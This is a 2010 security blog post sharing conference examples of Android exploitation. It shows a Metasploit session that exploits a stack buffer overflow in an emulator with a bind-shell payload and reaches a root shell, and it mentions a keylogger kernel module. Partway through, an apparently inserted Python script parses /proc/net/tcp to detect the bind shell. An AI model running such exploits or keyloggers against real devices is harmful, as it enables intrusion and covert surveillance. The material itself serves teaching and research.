Limited Entropy Dot Com Not so random thoughts on security featured by Eloi Sanfèlix

15 Apr 2010

RootedCON: Examples + small summary

It's been almost a month since RootedCON, but I hadn't found any time to prepare the .tgz file with the example shellcodes, PoC apps and exploits we showed during our talk. Nor had I published any kind of summary of the event...

You can also find Javi's post on RootedCON here. It's in Spanish, don't say I didn't warn you ;-). You can also find the slides of our presentation here.

Examples from our presentation on Android exploitation

First things first, here are the examples we used during the presentation. As a quick summary, this is how I use the buffer overflow exploit.

First, launch the emulator and wait for it to start. Then, with adb, you need to forward a couple of ports: 2000 for the vulnerable app and whatever port you like for your bind shell. Then you can launch the binary, which I had uploaded with adb push to /data/bin/myapp:

eloi@EloiLT:~/android/paper$ adb forward tcp:2000 tcp:2000
eloi@EloiLT:~/android/paper$ adb forward tcp:2222 tcp:2222
eloi@EloiLT:~/android/paper$ adb shell
# /data/bin/myapp

Now, you can launch the exploit from metasploit:

msf > use exploit/linux/misc/android_stack
msf exploit(android_stack) > set payload linux/armle/shell_bind_tcp
payload => linux/armle/shell_bind_tcp
msf exploit(android_stack) > set RPORT 2000
RPORT => 2000
msf exploit(android_stack) > set LPORT 2222
LPORT => 2222
msf exploit(android_stack) > exploit
 
[*] Started bind handler
[*] Command shell session 1 opened (127.0.0.1:55207 -> 127.0.0.1:2222)
 
[*] Command shell session 1 closed.
msf exploit(android_stack) > exploit
 
[*] Started bind handler
[*] Command shell session 2 opened (127.0.0.1:34834 -> 127.0.0.1:2222)
 
/system/bin/id
uid=0(root) gid=0(root)
exit
 
[*] Command shell session 2 closed.
msf exploit(android_stack) >
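The bind shell the payload opens on LPORT 2222 is visible from inside the device as a new LISTEN socket. As an added example (not part of the RootedCON tarball), this script parses /proc/net/tcp, which Android exposes like any Linux system, and flags listeners outside an allowlist; the sample socket table is constructed and the allowed-port set is an assumption.

```python
# Added example: flag unexpected listening TCP sockets on a Linux/Android
# device by parsing /proc/net/tcp, the way a simple host check would catch
# the bind shell the demo payload opens on port 2222.

LISTEN = "0A"  # socket state value for TCP LISTEN in /proc/net/tcp

# Constructed sample of /proc/net/tcp: the demo app listening on 2000,
# the bind shell listening on 2222, and one established client connection.
SAMPLE_PROC_NET_TCP = """\
  sl  local_address rem_address   st tx_queue rx_queue tr tm->when retrnsmt   uid  timeout inode
   0: 00000000:07D0 00000000:0000 0A 00000000:00000000 00:00000000 00000000     0        0 12345 1 00000000 100 0 0 10 -1
   1: 00000000:08AE 00000000:0000 0A 00000000:00000000 00:00000000 00000000     0        0 12346 1 00000000 100 0 0 10 -1
   2: 0100007F:07D0 0100007F:D7C7 01 00000000:00000000 00:00000000 00000000     0        0 12347 1 00000000 20 4 30 10 -1
"""


def parse_proc_net_tcp(text):
    """Yield (local_ip, local_port, state, uid) for each socket line."""
    for line in text.splitlines()[1:]:  # first line is the column header
        fields = line.split()
        if len(fields) < 8:
            continue
        ip_hex, port_hex = fields[1].split(":")
        # IPv4 addresses are stored as little-endian hex: 0100007F -> 127.0.0.1
        octets = [int(ip_hex[i:i + 2], 16) for i in (6, 4, 2, 0)]
        yield ".".join(map(str, octets)), int(port_hex, 16), fields[3], int(fields[7])


def unexpected_listeners(text, allowed_ports):
    """Return LISTEN sockets whose port is not in the allowlist (assumed set)."""
    hits = []
    for ip, port, state, uid in parse_proc_net_tcp(text):
        if state == LISTEN and port not in allowed_ports:
            hits.append({"ip": ip, "port": port, "uid": uid})
    return hits


if __name__ == "__main__":
    # Only the demo app on 2000 is expected; the root-owned shell on 2222 is reported.
    for hit in unexpected_listeners(SAMPLE_PROC_NET_TCP, {2000}):
        print("unexpected listener %s:%d (uid %d)" % (hit["ip"], hit["port"], hit["uid"]))
```

On a real device, read the text from /proc/net/tcp instead of the constructed sample; a uid of 0 on the unexpected listener matches the root shell shown in the session above.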

The same thing applies to the cpp_challenge demo application: you just use a different exploit, but that's it. Beware that you might have to tune some addresses for your local installation, as they are hardcoded. However, I believe they should be static for every installation.

In addition to the apps and the metasploit stuff, you can also find two kernel modules. One is a simple module that finds the syscall table, and the other one is a keyboard logger. The latter only works for Linux >= 2.6.28; for earlier versions you need to change it slightly.

RootedCON mini-summary

I won't spend much time on it, as it's been quite some time already and I don't feel like writing a complete summary of it.

Overall I think it was a great event. Sure, there is stuff that can be improved, as everywhere, but for a first edition it was very good. Of the talks I attended, in my opinion there were great ones but also one or two I didn't really like. On our side, we are pretty happy with the way it was received and the reactions we have seen 🙂

Besides the talks, and probably even more important, it was great to meet so many people that I would otherwise only know through the Internet. Cheers to all of you guys, hope to see you next year at RootedCON or maybe earlier somewhere else 🙂

Posted by Eloi Sanfèlix

Comments (4) Trackbacks (2)
  1. The link for the examples is broken 😉

  2. Fuck! Thanks neofito, solved it 🙂 I uploaded it with a name and then renamed it but forgot to change the link in the post :$

    Sorry!

  3. There are a few files missing from the tarball. (that are listed in the readme)

  4. Oops! I’m such a mess… haha

    I didn’t realize before. Javi told me earlier this week that the encoder was missing and I told him I’d upload it, but now I’ve checked the tarball and as you mention there are things listed in the readme that are not there.

    The main reason is that the README contained my own notes during the development and when Javi and I were sharing things hehe. Anyway, the most important missing part is the encoder.

    I’ll find it and re-upload the tarball during today.

    Thanks for noting it!
